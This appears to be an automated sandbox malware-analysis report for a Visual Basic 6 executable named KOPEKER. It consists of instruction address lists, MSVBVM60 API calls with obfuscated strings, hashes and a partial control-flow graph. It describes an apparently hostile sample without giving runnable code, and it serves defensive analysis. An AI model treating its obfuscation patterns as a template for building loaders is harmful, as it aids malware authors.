          0x00413c75
          0x00413c7a
          0x00413c7a
          0x00413c8f
          0x00413c92
          0x00413ca1
          0x00413ca7
          0x00413cb6
          0x00413cbc
          0x00413cc9
          0x00413ceb
          0x00413ceb
          0x00413ceb
          0x00413ccb
          0x00413ccb
          0x00413cd0
          0x00413cd5
          0x00413cd8
          0x00413cde
          0x00413ce3
          0x00413ce3
          0x00413cf2
          0x00413cf9
          0x00413d08
          0x00413d30
          0x00413d3c
          0x00413d42
          0x00413d49
          0x00413d58
          0x00413d80
          0x00413d8d
          0x00413d94
          0x00413daa
          0x00413db0
          0x00413dbd
          0x00413ddf
          0x00413ddf
          0x00413ddf
          0x00413dbf
          0x00413dbf
          0x00413dc4
          0x00413dc9
          0x00413dcc
          0x00413dd2
          0x00413dd7
          0x00413dd7
          0x00413ded
          0x00413df4
          0x00413e0a
          0x00413e10
          0x00413e1d
          0x00413e3f
          0x00413e3f
          0x00413e3f
          0x00413e1f
          0x00413e1f
          0x00413e24
          0x00413e29
          0x00413e2c
          0x00413e32
          0x00413e37
          0x00413e37
          0x00413e4c
          0x00413e52
          0x00413e64
          0x00413e69
          0x00413e8f
          0x00413e95
          0x00413e9b
          0x00413ea4
          0x00413ea9
          0x00413eb0
          0x00413eba
          0x00413ec7
          0x00413ec8
          0x00413ece
          0x00413ecf
          0x00413ed4
          0x00413ed9
          0x00000000
          0x00000000
          0x00413edb
          0x00413ee0
          0x00413ee7
          0x00413ef1
          0x00413ef1
          0x00413ef2
          0x00413ef2
          0x00413eff
          0x00413f03
          0x00413f04
          0x00413f09
          0x00413f10
          0x00413f1a
          0x00413f24
          0x00413f2e
          0x00413f33
          0x00413f38
          0x00413f3e
          0x00413f3f
          0x00413f44
          0x00413f4b
          0x00413f52
          0x00413f59
          0x00413f5a
          0x00413f5f
          0x00413f64
          0x00413f6a
          0x00413f6b
          0x00413f70
          0x00413f71
          0x00413f76
          0x00413f7c
          0x00413f7d
          0x00413f82
          0x00413f83
          0x00413f88
          0x00413f8e
          0x00413f95
          0x00413fa4
          0x00413fb1
          0x00413fb8
          0x00413fbf
          0x00413fc0
          0x00413fc2
          0x00413fc7
          0x00413fd1
          0x00413fd3
          0x00413fd9
          0x00413fe0
          0x00413fe7
          0x00413fee
          0x0041400b
          0x00413ff0
          0x00413ff0
          0x00413ff5
          0x00413ffa
          0x00413fff
          0x00413fff
          0x0041401d
          0x00414030
          0x00414037
          0x0041403c
          0x00414040
          0x00414046
          0x0041404d
          0x00414061
          0x00414064
          0x00414066
          0x0041406c
          0x00414073
          0x00414095
          0x00414095
          0x00414095
          0x00414075
          0x00414075
          0x00414077
          0x0041407c
          0x00414082
          0x00414088
          0x0041408d
          0x0041408d
          0x004140a2
          0x004140ad
          0x004140ad
          0x004140b2
          0x004140b9
          0x004140c3
          0x004140ca
          0x004140cf
          0x004140d5
          0x004140d6
          0x004140db
          0x004140dc
          0x004140e1
          0x004140e8
          0x004140fb
          0x00414100
          0x0041410d
          0x00414119
          0x0041411b
          0x0041411d
          0x00414124
          0x0041412b
          0x00414135
          0x0041413f
          0x00414149
          0x00414153
          0x00414156
          0x00414163
          0x00414164
          0x00414165
          0x00414166
          0x00414167
          0x0041416a
          0x00414177
          0x00414178
          0x00414179
          0x0041417a
          0x0041417b
          0x0041417d
          0x00414182
          0x00414185
          0x0041418a
          0x0041418a
          0x0041418d
          0x00414194
          0x00414199
          0x0041419e
          0x004141a4
          0x004141a5
          0x004141aa
          0x004141ab
          0x004141b0
          0x004141b6
          0x004141b7
          0x004141bc
          0x004141bd
          0x004141c2
          0x004141c7
          0x004141cc
          0x004141d1
          0x004141d7
          0x004141de
          0x004141ed
          0x004141fa
          0x00414201
          0x00414202
          0x00414204
          0x00414209
          0x0041420c
          0x00414213
          0x00414215
          0x00414217
          0x0041421e
          0x00414225
          0x00414227
          0x00414232
          0x00414233
          0x0041423a
          0x0041423b
          0x00414248
          0x00414249
          0x0041424a
          0x0041424b
          0x0041424c
          0x0041424e
          0x00414254
          0x0041425f
          0x0041425f
          0x00414264
          0x0041426b
          0x00414270
          0x00414275
          0x0041427a
          0x0041427f
          0x00414284
          0x0041428a
          0x0041428f
          0x00414299
          0x0041429b
          0x004142a2
          0x004142a9
          0x004142b3
          0x004142c9
          0x004142ce
          0x004142d0
          0x004142d6
          0x004142d7
          0x004142dc
          0x004142e8
          0x004142e8
          0x004142ed
          0x004142f4
          0x004142f9
          0x004142fe
          0x00414303
          0x00414309
          0x0041430e
          0x00414318
          0x0041431e
          0x00414325
          0x0041432f
          0x00414339
          0x00414343
          0x0041434d
          0x00414357
          0x00414361
          0x0041436b
          0x00414381
          0x0041438c
          0x00414393
          0x0041439a
          0x0041439b
          0x004143a3
          0x004143a4
          0x004143af
          0x004143b6
          0x004143bd
          0x004143be
          0x004143c4
          0x004143c5
          0x004143c7
          0x004143cc
          0x004143cc
          0x004143cf
          0x004143e1
          0x004143e6
          0x004143ed
          0x004143ee
          0x004143f3
          0x004143f8
          0x004143fe
          0x004143ff
          0x00414404
          0x0041440a
          0x00414411
          0x00414420
          0x0041442d
          0x00414434
          0x00414435
          0x00414437
          0x0041443f
          0x00414446
          0x00414448
          0x0041444a
          0x00414451
          0x00414456
          0x00414456
          0x0041445b
          0x00414462
          0x00414467
          0x0041446c
          0x00414471
          0x00414477
          0x0041447c
          0x00414486
          0x00414488
          0x0041448f
          0x00414499
          0x004144af
          0x004144ba
          0x004144bb
          0x004144c6
          0x004144c6
          0x004144cb
          0x004144d2
          0x004144d7
          0x004144dd
          0x004144de
          0x004144e3
          0x004144e4
          0x004144e9
          0x004144ee
          0x004144f4
          0x004144fb
          0x0041450a
          0x00414517
          0x0041451c
          0x00414523
          0x00414525
          0x00414527
          0x0041452e
          0x00414535
          0x0041453f
          0x00414555
          0x0041455a
          0x0041455c
          0x00414562
          0x00414563
          0x00414568
          0x00414574
          0x00414574
          0x00414579
          0x00414580
          0x00414585
          0x0041458a
          0x0041458f
          0x00414594
          0x0041459a
          0x0041459f
          0x004145a9
          0x004145af
          0x004145b6
          0x004145bd
          0x004145da
          0x004145bf
          0x004145bf
          0x004145c4
          0x004145c9
          0x004145ce
          0x004145ce
          0x004145ec
          0x004145f5
          0x004145fc
          0x00414610
          0x00414613
          0x00414615
          0x0041461b
          0x00414622
          0x00414644
          0x00414644
          0x00414644
          0x00414624
          0x00414624
          0x00414626
          0x0041462b
          0x00414631
          0x00414637
          0x0041463c
          0x0041463c
          0x00414651
          0x00414651
          0x00414656
          0x0041465d
          0x00414662
          0x00414667
          0x0041466c
          0x00414671
          0x00414677
          0x0041467c
          0x00414686
          0x0041468c
          0x004146a2
          0x004146a8
          0x004146aa
          0x004146b0
          0x004146b7
          0x004146d9
          0x004146d9
          0x004146d9
          0x004146b9
          0x004146b9
          0x004146be
          0x004146c3
          0x004146c6
          0x004146cc
          0x004146d1
          0x004146d1
          0x004146e0
          0x004146e7
          0x00414704
          0x004146e9
          0x004146e9
          0x004146ee
          0x004146f3
          0x004146f8
          0x004146f8
          0x00414716
          0x00414722
          0x00414728
          0x0041473a
          0x00414741
          0x00414755
          0x00414758
          0x0041475a
          0x00414760
          0x00414767
          0x00414789
          0x00414789
          0x00414789
          0x00414769
          0x00414769
          0x0041476b
          0x00414770
          0x00414776
          0x0041477c
          0x00414781
          0x00414781
          0x00414796
          0x00414796
          0x0041479b
          0x004147a2
          0x004147a7
          0x004147ac
          0x004147b2
          0x004147b7
          0x004147c1
          0x004147c7
          0x004147ce
          0x004147d5
          0x004147df
          0x004147e9
          0x004147f3
          0x004147fd
          0x00414807
          0x00414811
          0x0041481b
          0x00414825
          0x0041482f
          0x00414839
          0x00414843
          0x0041484d
          0x00414857
          0x0041486d
          0x00414878
          0x0041487f
          0x00414886
          0x0041488d
          0x00414894
          0x0041489b
          0x004148a2
          0x004148a3
          0x004148b0
          0x004148bb
          0x004148c2
          0x004148c9
          0x004148d0
          0x004148d7
          0x004148de
          0x004148e5
          0x004148e6
          0x004148e8
          0x004148ed
          0x004148f0
          0x004148f7
          0x004148fc
          0x00414902
          0x00414903
          0x00414908
          0x00414909
          0x0041490e
          0x00414914
          0x0041491b
          0x0041492a
          0x00414937
          0x0041493c
          0x00414943
          0x00414945
          0x00414947
          0x0041494e
          0x00414955
          0x00414957
          0x0041495c
          0x0041495c
          0x00414962
          0x00414969
          0x0041496b
          0x00414970
          0x00414975
          0x0041497b
          0x0041497d
          0x0041497e
          0x00414980
          0x00414987
          0x00414987
          0x0041498c
          0x00414993
          0x00414994
          0x00414a11
          0x00414a19
          0x00414a21
          0x00414a29
          0x00414a34
          0x00414a3f
          0x00414a4a
          0x00414a55
          0x00414a5a

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 004129D2
          • #680.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A,0000000A), ref: 00412A80
          • __vbaFreeVarList.MSVBVM60(00000003,0000000A,0000000A,0000000A,?,?,?,?,?,?,0000000A,0000000A,0000000A), ref: 00412AA2
          • #664.MSVBVM60(?,00000002,00000002,00000002,00000002), ref: 00412B21
          • __vbaStrVarVal.MSVBVM60(?,?,?,00000002,00000002,00000002,00000002), ref: 00412B34
          • #581.MSVBVM60(00000000,?,?,?,00000002,00000002,00000002,00000002), ref: 00412B3A
          • __vbaFpR8.MSVBVM60(00000000,?,?,?,00000002,00000002,00000002,00000002), ref: 00412B3F
          • __vbaFreeStr.MSVBVM60 ref: 00412B77
          • __vbaFreeVarList.MSVBVM60(00000005,00000002,00000002,00000002,00000002,?), ref: 00412BA1
          • #716.MSVBVM60(?,Filmselskabets,00000000,?,?,?,?,?,?,?,?,?,004016F6), ref: 00412BD0
          • __vbaChkstk.MSVBVM60(?,Filmselskabets,00000000,?,?,?,?,?,?,?,?,?,004016F6), ref: 00412BD8
          • __vbaLateIdSt.MSVBVM60(?,00000000,?,Filmselskabets,00000000,?,?,?,?,?,?,?,?,?,004016F6), ref: 00412BEE
          • __vbaFreeVar.MSVBVM60(?,00000000,?,Filmselskabets,00000000,?,?,?,?,?,?,?,?,?,004016F6), ref: 00412BF9
          • #516.MSVBVM60(00411A30,?,?,?,?,?,?,?,?,?,004016F6), ref: 00412C0A
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105B8,00000254), ref: 00412C50
          • #676.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 00412CB6
          • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 00412CBB
          • __vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A), ref: 00412CFD
          • __vbaChkstk.MSVBVM60 ref: 00412D60
          • __vbaChkstk.MSVBVM60 ref: 00412D74
          • __vbaChkstk.MSVBVM60 ref: 00412D88
          • __vbaLateMemCall.MSVBVM60(?,NzXRmXMzPSdU58,00000003), ref: 00412DA6
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,00000718), ref: 00412DEC
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,00000708), ref: 00412EB2
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,00000708), ref: 00412F38
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,000006F8), ref: 00412F9B
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,000006FC), ref: 0041308C
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,00000718), ref: 004130EC
          • __vbaStrCopy.MSVBVM60(00000000,?,004105E8,00000718), ref: 0041311E
          • __vbaFreeStr.MSVBVM60 ref: 0041315E
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,000006F8), ref: 00413212
          • __vbaStrCopy.MSVBVM60(00000000,?,004105E8,000006F8), ref: 00413238
          • __vbaFreeStr.MSVBVM60 ref: 00413272
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,000006F8), ref: 004132F1
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,0000070C,?,?,8904D3F8,000000F1,0CDBA990,00005B00,?,8904D3F8,?), ref: 004133BA
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,00000700,?,?,8904D3F8,000000F1,0CDBA990,00005B00,?,8904D3F8,?), ref: 00413405
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,0000070C,?,?,98E72E79,00000012,B33C5640,00005B05,?,00000059,?,00000086), ref: 0041358B
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,000006F8,?,?,98E72E79,00000012,B33C5640,00005B05,?,00000059,?,00000086), ref: 004135D6
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,0000070C,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79,00000012,B33C5640,00005B05), ref: 0041369B
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,000006FC,?,?,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79,00000012), ref: 004137B4
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,000006F8,?,?,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79,00000012), ref: 0041380D
          • __vbaStrCopy.MSVBVM60(?,?,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79,00000012,B33C5640,00005B05,?,00000059), ref: 00413833
          • __vbaFreeStr.MSVBVM60(?,?,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79,00000012,B33C5640,00005B05,?,00000059), ref: 00413870
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,00000710,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06), ref: 00413949
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,00000708,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06), ref: 004139D5
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,00000714,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06), ref: 00413AAC
          • __vbaOnError.MSVBVM60(000000FF,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79), ref: 00413AD5
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105B8,000001B8,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06), ref: 00413B1A
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105B8,000001BC,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06), ref: 00413B6D
          • __vbaVarMove.MSVBVM60(?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79,00000012), ref: 00413BA9
          • __vbaVarAdd.MSVBVM60(?,00000002,?,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06), ref: 00413BDB
          • __vbaVarMove.MSVBVM60(?,00000002,?,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06), ref: 00413BE5
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,00000704,?,?,?,00000002,?,00008003,?,?,?,?,00000002,?), ref: 00413C75
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,000006F8,?,?,?,00000002,?,00008003,?,?,?,?,00000002,?), ref: 00413CDE
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,000006FC,?,?,?,00000002,?,00008003,?,?,?,?,00000002,?), ref: 00413DD2
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,00000718,?,?,?,00000002,?,00008003,?,?,?,?,00000002,?), ref: 00413E32
          • __vbaStrCopy.MSVBVM60(?,?,?,00000002,?,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20), ref: 00413E64
          • __vbaFreeStr.MSVBVM60(?,?,?,00000002,?,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20), ref: 00413EA4
          • __vbaVarTstLt.MSVBVM60(00008003,?,?,?,?,00000002,?,?,0000037B,?,0000037B,?,?,?,?,)#), ref: 00413ECF
          • __vbaVarMove.MSVBVM60(?,?,?,00000002,?,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20), ref: 00413F04
          • __vbaStrToAnsi.MSVBVM60(?,bangsternears,98E72E79,?,?,?,00000002,?,?,0000037B,?,0000037B), ref: 00413F3F
          • __vbaStrToAnsi.MSVBVM60(?,samtaleemnetsrhes,008310A4,0005F72A,98E72E79,8904D3F8,00000000,?,bangsternears,98E72E79,?,?,?,00000002,?), ref: 00413F6B
          • __vbaStrToAnsi.MSVBVM60(?,Charcuterieganocephalantu,00000000,?,samtaleemnetsrhes,008310A4,0005F72A,98E72E79,8904D3F8,00000000,?,bangsternears,98E72E79,?,?,?), ref: 00413F7D
          • __vbaSetSystemError.MSVBVM60(00000000,?,Charcuterieganocephalantu,00000000,?,samtaleemnetsrhes,008310A4,0005F72A,98E72E79,8904D3F8,00000000,?,bangsternears,98E72E79), ref: 00413F8E
          • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,00000000,?,Charcuterieganocephalantu,00000000,?,samtaleemnetsrhes,008310A4,0005F72A,98E72E79,8904D3F8,00000000,?), ref: 00413FC2
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,?,?,?,?,?,?,00411A30), ref: 00413FFA
          • __vbaLateMemCallLd.MSVBVM60(?,?,M9uACtmJ7nAtSvje8kbN9w249,00000000), ref: 00414037
          • __vbaObjVar.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,00411A30), ref: 00414040
          • __vbaObjSetAddref.MSVBVM60(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00411A30), ref: 0041404D
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,0000000C), ref: 00414088
          • __vbaFreeObj.MSVBVM60(00000000,?,00411AD0,0000000C), ref: 004140A2
          • __vbaFreeVar.MSVBVM60(00000000,?,00411AD0,0000000C), ref: 004140AD
          • __vbaStrToAnsi.MSVBVM60(?,bangsternears, 'y), ref: 004140D6
          • __vbaSetSystemError.MSVBVM60(00000000,?,bangsternears, 'y), ref: 004140E8
          • __vbaFreeStr.MSVBVM60(00000000,?,bangsternears, 'y), ref: 0041410D
          • __vbaChkstk.MSVBVM60(00000000,?,bangsternears, 'y), ref: 00414156
          • __vbaChkstk.MSVBVM60(00000000,?,bangsternears, 'y), ref: 0041416A
          • __vbaLateMemCall.MSVBVM60(?,EAuxmqjme0cZFWWnSnEvZMsikYtH2nYa25,00000002,00000000,?,bangsternears, 'y), ref: 00414185
          • __vbaStrToAnsi.MSVBVM60(?,Statscheferstronhi8,8904D3F8,00000000,?,bangsternears, 'y), ref: 004141A5
          • __vbaStrToAnsi.MSVBVM60(?,encryptions,00000000,?,Statscheferstronhi8,8904D3F8,00000000,?,bangsternears, 'y), ref: 004141B7
          • __vbaSetSystemError.MSVBVM60(8904D3F8,003DB7DB,00753ECA,00000000,?,encryptions,00000000,?,Statscheferstronhi8,8904D3F8,00000000,?,bangsternears, 'y), ref: 004141D7
          • __vbaFreeStrList.MSVBVM60(00000002,?,?,8904D3F8,003DB7DB,00753ECA,00000000,?,encryptions,00000000,?,Statscheferstronhi8,8904D3F8,00000000,?,bangsternears), ref: 00414204
          • #716.MSVBVM60(?,sykofanter,00000000,?,?,?,?,?,?,?,?,?,00411A30), ref: 00414233
          • __vbaChkstk.MSVBVM60(?,sykofanter,00000000,?,?,?,?,?,?,?,?,?,00411A30), ref: 0041423B
          • __vbaLateIdSt.MSVBVM60(?,00000000,?,sykofanter,00000000,?,?,?,?,?,?,?,?,?,00411A30), ref: 00414254
          • __vbaFreeVar.MSVBVM60(?,00000000,?,sykofanter,00000000,?,?,?,?,?,?,?,?,?,00411A30), ref: 0041425F
          • __vbaSetSystemError.MSVBVM60(98E72E79,98E72E79,8904D3F8,003A3AEA,?,?,?,?,?,?,?,?,?,00411A30), ref: 0041428A
          • __vbaVarDup.MSVBVM60 ref: 004142C9
          • #600.MSVBVM60(?,00000002), ref: 004142D7
          • __vbaFreeVar.MSVBVM60(?,00000002), ref: 004142E8
          • __vbaSetSystemError.MSVBVM60(0058E1C9,00350DDE), ref: 00414309
          • __vbaVarDup.MSVBVM60(0058E1C9,00350DDE), ref: 00414381
          • #595.MSVBVM60(?,00000000,0000000A,0000000A,0000000A,0058E1C9,00350DDE), ref: 004143A4
          • __vbaFreeVarList.MSVBVM60(00000004,?,0000000A,0000000A,0000000A,?,00000000,0000000A,0000000A,0000000A,0058E1C9,00350DDE), ref: 004143C7
          • __vbaStrCopy.MSVBVM60(0058E1C9,00350DDE), ref: 004143E1
          • __vbaStrToAnsi.MSVBVM60(?,00000000,0058E1C9,00350DDE), ref: 004143EE
          • __vbaSetSystemError.MSVBVM60(?,8904D3F8,?,00000000,0058E1C9,00350DDE), ref: 0041440A
          • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,8904D3F8,?,00000000,0058E1C9,00350DDE), ref: 00414437
          • #532.MSVBVM60(LAANELOFTERNE,98E72E79,8904D3F8,003A3AEA,?,?,?,?,?,?,?,?,?,00411A30), ref: 00414456
          • __vbaSetSystemError.MSVBVM60(000D2930,8904D3F8,98E72E79,8904D3F8,003A3AEA,?,?,?,?,?,?,?,?,?,00411A30), ref: 00414477
          • __vbaVarDup.MSVBVM60 ref: 004144AF
          • #529.MSVBVM60(?), ref: 004144BB
          • __vbaFreeVar.MSVBVM60(?), ref: 004144C6
          • __vbaStrToAnsi.MSVBVM60(?,Gooiest4), ref: 004144DE
          • __vbaSetSystemError.MSVBVM60(98E72E79,00000000,?,Gooiest4), ref: 004144F4
          • __vbaFreeStr.MSVBVM60(98E72E79,00000000,?,Gooiest4), ref: 00414517
          • __vbaVarDup.MSVBVM60(98E72E79,00000000,?,Gooiest4), ref: 00414555
          • #600.MSVBVM60(?,00000002,98E72E79,00000000,?,Gooiest4), ref: 00414563
          • __vbaFreeVar.MSVBVM60(?,00000002,98E72E79,00000000,?,Gooiest4), ref: 00414574
          • __vbaSetSystemError.MSVBVM60(0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 0041459A
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 004145C9
          • __vbaObjSetAddref.MSVBVM60(?,?), ref: 004145FC
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,00000010), ref: 00414637
          • __vbaFreeObj.MSVBVM60(00000000,?,00411AD0,00000010), ref: 00414651
          • __vbaSetSystemError.MSVBVM60(8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 00414677
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105B8,00000160), ref: 004146CC
          • __vbaNew2.MSVBVM60(00411AE0,004183D8), ref: 004146F3
          • __vbaObjSet.MSVBVM60(?,?,incomprehensible), ref: 00414741
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,00000040), ref: 0041477C
          • __vbaFreeObj.MSVBVM60(00000000,?,00411AD0,00000040), ref: 00414796
          • __vbaSetSystemError.MSVBVM60(8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 004147B2
          • __vbaVarDup.MSVBVM60(8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 0041486D
          • #596.MSVBVM60(?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000), ref: 004148A3
          • __vbaStrMove.MSVBVM60(?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000), ref: 004148B0
          • __vbaFreeVarList.MSVBVM60(00000007,?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,8904D3F8), ref: 004148E8
          • __vbaStrToAnsi.MSVBVM60(?,Gastriloquy,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 00414903
          • __vbaSetSystemError.MSVBVM60(00000000,?,Gastriloquy,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 00414914
          • __vbaFreeStr.MSVBVM60(00000000,?,Gastriloquy,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 00414937
          • #570.MSVBVM60(0000001C,00000000,?,Gastriloquy,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 00414957
          • _CIcos.MSVBVM60(00000000,?,Gastriloquy,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 0041496B
          • __vbaFpR8.MSVBVM60(00000000,?,Gastriloquy,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 00414970
          • __vbaEnd.MSVBVM60(00000000,?,Gastriloquy,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 00414987
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$CheckHresult$Free$Error$System$Ansi$ChkstkList$CopyLate$Move$CallNew2$#600#716Addref$#516#529#532#570#581#595#596#664#676#680Icos
          • String ID: Ausones$Charcuterieganocephalantu$EAuxmqjme0cZFWWnSnEvZMsikYtH2nYa25$Filmselskabets$Gastriloquy$Gooiest4$LAANELOFTERNE$M9uACtmJ7nAtSvje8kbN9w249$NzXRmXMzPSdU58$Porto7$Statscheferstronhi8$Subskriptionen8$bangsternears$c$d$encryptions$incomprehensible$rebslagerierneshand$s[$samtaleemnetsrhes$solicit$sykofanter$t$)#
          • API String ID: 759312655-2082158243
          • Opcode ID: 2bddbde34037f444cc3a5a854415b24bea497ccdb230e0d1c98109061f9f0066
          • Instruction ID: 4a9a28434090fcadc7b4776753156bd0f1509fff4348be5e96b67bca76e501b3
          • Opcode Fuzzy Hash: 2bddbde34037f444cc3a5a854415b24bea497ccdb230e0d1c98109061f9f0066
          • Instruction Fuzzy Hash: 1E13C3B1901619EFDB21EF50CD89BDDBBB4BF04305F0041EAE508AA2A0D7799B94DF58
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00406FFA, Relevance: 47.8, APIs: 22, Strings: 5, Instructions: 506COMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 235 406ffa-4135ce 237 4135d0-4135d6 __vbaHresultCheckObj 235->237 238 4135d8 235->238 237->238 238->238 239 4135da-4135e1 238->239 241 4135ea-413670 call 41593d 239->241 243 413679-413686 241->243 244 4136a8 243->244 245 413688-4136a6 __vbaHresultCheckObj 243->245 246 4136af-4136c2 244->246 245->246 247 4136cb-413770 call 41593d call 417239 246->247 249 413776-41379f 247->249 251 4137c1 249->251 252 4137a1-4137bf __vbaHresultCheckObj 249->252 253 4137c8-4137f8 251->253 252->253 255 41381a 253->255 256 4137fa-413818 __vbaHresultCheckObj 253->256 257 413821-413934 __vbaStrCopy __vbaFreeStr 255->257 256->257 262 413956 257->262 263 413936-413954 __vbaHresultCheckObj 257->263 264 41395d-4139aa 262->264 263->264 265 4139b3-4139c0 264->265 266 4139e2 265->266 267 4139c2-4139e0 __vbaHresultCheckObj 265->267 268 4139e9-413a36 266->268 267->268 269 413a3f-413a81 268->269 270 413a8a-413a97 269->270 271 413ab9 270->271 272 413a99-413ab7 __vbaHresultCheckObj 270->272 273 413ac0-413b05 __vbaOnError 271->273 272->273 275 413b27 273->275 276 413b07-413b25 __vbaHresultCheckObj 273->276 277 413b2e-413b58 275->277 276->277 279 413b7a 277->279 280 413b5a-413b78 __vbaHresultCheckObj 277->280 281 413b81-413ba9 __vbaVarMove 279->281 280->281 282 413bae-413c4d __vbaVarAdd __vbaVarMove call 417239 call 41165c 281->282 284 413c53-413c60 282->284 285 413c82 284->285 286 413c62-413c80 __vbaHresultCheckObj 284->286 287 413c89-413cc9 285->287 286->287 290 413ceb 287->290 291 413ccb-413ce9 __vbaHresultCheckObj 287->291 292 413cf2-413d2d 290->292 291->292 293 413d36-413d80 call 41593d 292->293 294 413d86-413dbd 293->294 296 413ddf 294->296 297 413dbf-413ddd __vbaHresultCheckObj 294->297 298 413de6-413e1d 296->298 297->298 300 413e3f 298->300 301 413e1f-413e3d __vbaHresultCheckObj 298->301 302 413e46-413ed9 __vbaStrCopy __vbaFreeStr __vbaVarTstLt 300->302 301->302 304 413ee0-413ee7 302->304 305 413edb 302->305 306 413ef1-413ef7 304->306 305->282 306->306 307 413ef9-413fd3 __vbaVarMove __vbaStrToAnsi * 3 call 4115f4 __vbaSetSystemError __vbaFreeStrList 306->307 311 4140b2-41411b __vbaStrToAnsi call 41165c __vbaSetSystemError __vbaFreeStr 307->311 312 413fd9-413fee 307->312 318 41418d-414215 